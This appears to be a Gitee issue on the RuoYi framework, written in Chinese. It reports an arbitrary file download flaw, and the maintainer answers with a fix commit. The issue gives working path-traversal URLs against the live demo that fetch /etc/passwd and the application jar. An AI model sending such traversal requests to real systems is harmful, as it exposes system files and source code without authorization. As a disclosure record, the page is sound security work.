5.9K Star 44.9K Fork 24.8K

GVP若依/RuoYi

 / 详情

任意文件读取漏洞 紧急

已完成
创建于  
2020-11-16 18:53

项目上线被扫除安全漏洞问题,可以下载服务器上任意文件 。如下:
输入图片说明

输入图片说明

ruoyi在线demo 也复现了这个漏洞,任意文件下载

https://demo.ruoyi.vip/
输入图片说明

复现步骤如下:

  1. 登录 https://demo.ruoyi.vip/
  2. 打开以下链接会自动下载服务器上的文件 (/etc/passwd可以替换为任意文件绝对路径):
    https://demo.ruoyi.vip/common/download/resource?resource=/profile/../../../../etc/passwd
    输入图片说明
    输入图片说明
    下载的文件如下:输入图片说明

输入图片说明

demo源代码下载地址:https://demo.ruoyi.vip/common/download/resource?resource=/profile/../../../../home/ruoyi/projects/ruoyi/target/ruoyi.jar

输入图片说明

评论 (3)

fengyibo 创建了任务 4年前
fengyibo 关联仓库设置为若依/RuoYi 4年前
fengyibo 修改了描述 4年前
fengyibo 修改了描述 4年前
fengyibo 修改了描述 4年前
fengyibo 修改了描述 4年前
fengyibo 修改了描述 4年前
fengyibo 修改了标题 4年前
fengyibo 修改了描述 4年前
fengyibo 修改了标题 4年前
fengyibo 修改了描述 4年前
fengyibo 修改了描述 4年前
展开全部操作日志
1151004 y project 1578942802 若依 拥有者 4年前

嗯,多谢提醒。已修复。
阻止任意文件下载漏洞
https://gitee.com/y_project/RuoYi/commit/18f6366f2e6908a151e02d0c18f1aa490e7d0a54

若依 任务状态待办的 修改为已完成 4年前

请问下这是什么扫描器,挺厉害的

直接扫的若依的这个漏洞,没什么厉害的。这又不是什么0day

登录 后才可以发表评论

状态
负责人
里程碑
Pull Requests
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
开始日期   -   截止日期
-
置顶选项
优先级
参与者(4)
1151004 y project 1578942802 icetea1-icetea1 kyang07-o7h1nk fengyibo-fengyibo9
Java
1
https://gitee.com/y_project/RuoYi.git
git@gitee.com:y_project/RuoYi.git
y_project
RuoYi
RuoYi

搜索帮助

371d5123 14472233 46e8bd33 14472233